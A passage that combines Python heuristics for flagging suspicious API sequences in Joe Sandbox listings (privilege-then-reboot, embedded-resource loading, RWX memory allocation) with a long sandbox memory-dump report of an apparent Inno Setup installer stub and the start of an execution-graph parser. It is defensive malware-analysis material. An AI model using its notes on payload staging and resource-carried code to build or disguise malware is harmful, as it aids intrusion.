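EWX_FLAGS = {0x0: "EWX_LOGOFF", 0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT",
             0x4: "EWX_FORCE", 0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
RT_TYPES = {0x3: "RT_ICON", 0x5: "RT_DIALOG", 0x6: "RT_STRING",
            0xA: "RT_RCDATA", 0x10: "RT_VERSION"}
PAGE_EXECUTE_READWRITE = 0x40

# Constructed sample: the functions from the listing above (argument lists
# shortened) plus one made-up VirtualAlloc line (ref 00401234) requesting RWX.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
Memory Dump Source
APIs
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
• SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3), ref: 00409C51
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3), ref: 00409C63
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?), ref: 00409C74
Memory Dump Source
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
Memory Dump Source
APIs
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00401234
Memory Dump Source
"""


def hexarg(arg: str) -> Optional[int]:
    """Joe Sandbox prints numeric arguments as hex; '?' or a string literal gives None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_functions(text: str) -> List[List[dict]]:
    """Split a listing into per-function call lists; a new list starts at each 'APIs' header."""
    functions: List[List[dict]] = []
    current: Optional[List[dict]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            functions.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            current.append({"api": m.group("api"), "module": m.group("module"),
                            "args": args, "ref": m.group("ref")})
    return functions


def has_sequence(calls: List[dict], prefixes: List[str]) -> bool:
    """Ordered subsequence match on API-name prefixes, so A/W suffixes do not matter."""
    i = 0
    for c in calls:
        if i < len(prefixes) and c["api"].startswith(prefixes[i]):
            i += 1
    return i == len(prefixes)


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Render a bit mask with the names from `table`; a zero value maps to the zero entry."""
    names = [n for bit, n in table.items() if bit and value & bit == bit]
    if value == 0 and 0 in table:
        names.append(table[0])
    return "|".join(names)


def analyze(text: str) -> List[str]:
    """Return one finding per suspicious pattern, keyed by the function's first call ref."""
    findings: List[str] = []
    for fn in parse_functions(text):
        if not fn:
            continue
        ref = fn[0]["ref"]
        # Rule 1: a token privilege is enabled and a shutdown/reboot is then requested.
        if has_sequence(fn, ["LookupPrivilegeValue", "AdjustTokenPrivileges", "ExitWindowsEx"]):
            priv = next((a for c in fn if c["api"].startswith("LookupPrivilegeValue")
                         for a in c["args"] if a.startswith("Se")), "?")
            ewx = next(c for c in fn if c["api"].startswith("ExitWindowsEx"))
            flags = decode_flags(hexarg(ewx["args"][0]) or 0, EWX_FLAGS)
            findings.append(f"{ref}: enables {priv} then ExitWindowsEx({flags})")
        # Rule 2: an embedded resource is located, loaded and mapped (payload-carrier pattern).
        if has_sequence(fn, ["FindResource", "LoadResource", "LockResource"]):
            fr = next(c for c in fn if c["api"].startswith("FindResource"))
            name, rtype = hexarg(fr["args"][1]), hexarg(fr["args"][2])
            tname = RT_TYPES.get(rtype, f"type {rtype}")
            findings.append(f"{ref}: loads embedded resource {name} ({tname}) into memory")
        # Rule 3: RWX memory is requested, a staging area for unpacked code.
        for c in fn:
            if c["api"] == "VirtualAlloc" and len(c["args"]) >= 4 \
                    and hexarg(c["args"][3]) == PAGE_EXECUTE_READWRITE:
                findings.append(f"{c['ref']}: VirtualAlloc with PAGE_EXECUTE_READWRITE")
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE):
        print(finding)
```

Run against SAMPLE it reports the reboot chain (EWX_REBOOT decoded from the 00000002 argument), the RT_RCDATA resource 11111 (0x2B67) being mapped, and the constructed RWX allocation; the real VirtualAlloc at 00407FA0 (MEM_COMMIT, PAGE_READWRITE) is deliberately not flagged, since read/write memory alone says nothing about intent. Prefix matching on API names keeps the rules independent of the A/W variant the sample happened to import.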
                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                                            • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                                                            • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                                            • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SystemTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2656138-0
                                                                                                                            • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                            • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                                            • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                            • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Version
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1889659487-0
                                                                                                                            • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                                            • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                                                            • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                                            • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
• Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
• Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
• Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• API String ID: 4190037839-2401316094
• Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
• Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
• Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
• Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
• GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
• GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
• GetLastError.KERNEL32(000000F5), ref: 00403C1E
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
• Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
• Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
• Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
• Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
  • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
• Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
• Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
• Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
• Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
• LocalFree.KERNEL32(0077A950,00000000,00401AB4), ref: 00401A1B
• VirtualFree.KERNEL32(?,00000000,00008000,0077A950,00000000,00401AB4), ref: 00401A3A
• LocalFree.KERNEL32(0077B950,?,00000000,00008000,0077A950,00000000,00401AB4), ref: 00401A79
• RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
• RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID:
• API String ID: 3782394904-0
• Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
• Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
• Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
• Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
Uniqueness

Uniqueness Score: -1.00%

APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
• ExitProcess.KERNEL32 ref: 00403DE5
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000$9@
• API String ID: 1220098344-1503883590
• Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
• Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
• Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
• Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
• Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
• Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
• Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
• Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: QueryValue
• String ID: )q@
• API String ID: 3660427363-2284170586
• Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
• Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
• Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
• Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                                                            Strings
                                                                                                                            • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                                                            • Setup, xrefs: 00409CAD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                             • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                             • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message
                                                                                                                            • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                                                            • API String ID: 2030045667-3271211647
                                                                                                                            • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                                            • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                                                            • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                                            • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                                                            • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                             • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                             • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CommandHandleLineModule
                                                                                                                            • String ID: U1hd.@
                                                                                                                            • API String ID: 2123368496-2904493091
                                                                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                             • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                             • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1458359878-0
                                                                                                                            • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                            • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                                            • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                            • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:16%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:4.6%
                                                                                                                            Total number of Nodes:2000
                                                                                                                            Total number of Limit Nodes:105
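Added example, not part of the Joe Sandbox report: the execution_graph text that follows is an interactive graph widget flattened into one token stream, where each node appears as `<id> <address> [label words]` and each edge as `<src>->

<dst>`. A node label is either the Windows API name(s) the sandbox saw called from that basic block (e.g. `CloseHandle`, `LocalAlloc TlsSetValue TlsGetValue TlsGetValue`) or an `N API calls` summary standing in for a collapsed sub-graph. The Python below recovers the graph from that stream, finds the roots (nodes with no predecessor) and lists the API names reachable from each root, which is what an analyst usually wants from the graph: "which API sequences hang off this entry point". The `SAMPLE` string is the first few nodes of the graph on this page, copied and cut short; the parsing rules (node ids of four or more decimal digits, addresses of six to eight hex digits, the `N API calls` summary form) are assumptions inferred from this page's text, not a documented Joe Sandbox format. For orientation, the `/SILENT, /VERYSILENT` help text at the MessageBoxA node above is the standard Inno Setup command-line usage message, so the function blocks in this dump belong to an Inno Setup installer stub; the roots below (FindWindowA, Sleep, CreateMutexA) are installer behaviour, which is worth knowing before spending time reversing them.

```python
import re
from collections import defaultdict, deque

# Constructed sample: the opening tokens of the execution_graph on this page,
# cut after a handful of nodes. Nodes are "<id> <hex address> [label...]",
# edges are "<src>-><dst>", and everything is run together on one line.
SAMPLE = (
    "execution_graph 49966 40cd00 49967 40cd12 49966->49967 49968 40cd0d "
    "49966->49968 49970 406f48 CloseHandle 49968->49970 49970->49967 "
    "49971 492848 49972 49287c 49971->49972 49973 49287e 49972->49973 "
    "49974 492892 49972->49974 50117 446f9c 32 API calls 49973->50117 "
    "49977 4928ce 49974->49977 49978 4928a1 49974->49978 49976 492887 Sleep "
    "50037 4928c9 49976->50037 50117->49976"
)

# Token shapes (assumed from the page, not a documented format).
EDGE = re.compile(r"^(\d+)->(\d+)$")          # "49966->49967"
NODE_ID = re.compile(r"^\d{4,}$")             # "49966" (labels like "32" are shorter)
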